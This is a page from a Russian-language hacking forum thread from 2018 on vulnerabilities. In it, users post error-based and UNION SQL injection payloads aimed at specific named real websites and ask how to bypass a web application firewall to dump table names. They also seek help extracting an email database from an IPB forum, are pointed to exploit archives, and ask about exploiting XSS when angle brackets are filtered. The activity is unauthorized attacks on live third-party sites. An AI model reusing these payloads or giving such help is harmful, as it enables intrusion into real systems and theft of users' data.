HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 230 из 296 « Первая < 130180220 226 227 228 229 230 231 232 233 234 240280 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #2291  
Старый 17.04.2018, 02:07
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию
Цитата:
Сообщение от Muracha  
Muracha said:

И почему не работает запрос, он же верный по своей структуре?
Spoiler: 1
http://wellaprof.elle.ru/competition?order_by=date&offset=1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(AES _DECRYPT(AES_ENCRYPT
(
TABLE_NAME
,0x71),0x71))))%2c1)
+FROM+INFORMATION_SCHEMA.TABLES
%20--%202
там waf
 
Ответить с цитированием

  #2292  
Старый 17.04.2018, 02:13
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию
Цитата:
Сообщение от Sensoft  
Sensoft said:

там waf
ссылается на неверный запрос:

Вроде не waf, а я как-то неправильно составил запрос.

Допускается кстати и так но ошибка идиентичная

Код:
Code:
http://wellaprof.elle.ru/competition?order_by=date&offset=1%20procedure%20analyse(extractvalue(rand()%2cconcat(0x3a%2cCONCAT(TABLE_NAME)))%2c1)+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61--%201
Цитата:
Сообщение от None  
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736' at line 1
Нашел интересную книгу

https://www.ptsecurity.com/upload/co...eev-CC-WAF.pdf

Попытался сделать по ней но тот же результат:

http://wellaprof.elle.ru/competition?order_by=date&offset=1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(TAB LE_NAME))),1)+ascii(lower(mid((from+information_sc hema.tables),1,1)))-- 1

По ней составил запрос для обхода WAF

Цитата:
Выводит значение XPATH syntax error: ':108'


А такое же значение как и (0x3a%2cCONCAT(TABLE_NAME)

Но понять не могу что фильтрует и как это обойти, чтобы вывести данные.



Цитата:
 
Ответить с цитированием

  #2293  
Старый 19.04.2018, 17:42
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию
Помогите пожалуйста, никак не могу сделать это

Код:
Code:
http://www.alphaonenow.org/story.php?news_id=2 UnIoN  select 1,2,3+--+-
Никак не могу получить вывод.
 
Ответить с цитированием

  #2294  
Старый 20.04.2018, 12:02
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию
как прописать чтобы вызвать tables ?



DB_A2FF5A_icodatabase
 
Ответить с цитированием

  #2295  
Старый 20.04.2018, 16:14
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию
Цитата:
Сообщение от Sensoft  
Sensoft said:

как прописать чтобы вызвать tables ?

DB_A2FF5A_icodatabase
Саня, загугли mssql injection
 
Ответить с цитированием

  #2296  
Старый 20.04.2018, 16:47
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию
Цитата:
Сообщение от BabaDook  
BabaDook said:

Саня, загугли mssql injection
Спасибо капитан очевидность.

Иди лучше дальше мёртвые сайты крути )
 
Ответить с цитированием

  #2297  
Старый 20.04.2018, 20:08
Notrak
Guest
Сообщений: n/a
Провел на форуме:
603

Репутация: 0
По умолчанию
Подскажите кто можете помочь с одного IPB форума (v 3.3.4) скачать БД емыйлов?

(пишите в личку)
 
Ответить с цитированием

  #2298  
Старый 20.04.2018, 20:24
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию
Цитата:
Сообщение от Notrak  
Notrak said:

Подскажите кто можете помочь с одного IPB форума (v 3.3.4) скачать БД емыйлов?
(пишите в личку)
https://www.exploit-db.com

https://0day.today

Найдёшь тут эксплоит тебе повезло не найдёшь значит не повезло
 
Ответить с цитированием

  #2299  
Старый 21.04.2018, 15:41
karkajoi
Guest
Сообщений: n/a
Провел на форуме:
96779

Репутация: 5
По умолчанию
Цитата:
Сообщение от Sensoft  
Sensoft said:

https://www.exploit-db.com
https://0day.today
Найдёшь тут эксплоит тебе повезло не найдёшь значит не повезло
Он мне писал, у меня просто нету времени крутить, там есть sql inject и WAF
 
Ответить с цитированием

  #2300  
Старый 21.04.2018, 16:26
hn4sty
Guest
Сообщений: n/a
Провел на форуме:
287

Репутация: 0
По умолчанию
ребят, приветствую!

Можно ли как нибудь заюзать XSS если фильтруются <> , то есть = пустое место
 
Ответить с цитированием
Ответ
Страница 230 из 296 « Первая < 130180220 226 227 228 229 230 231 232 233 234 240280 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ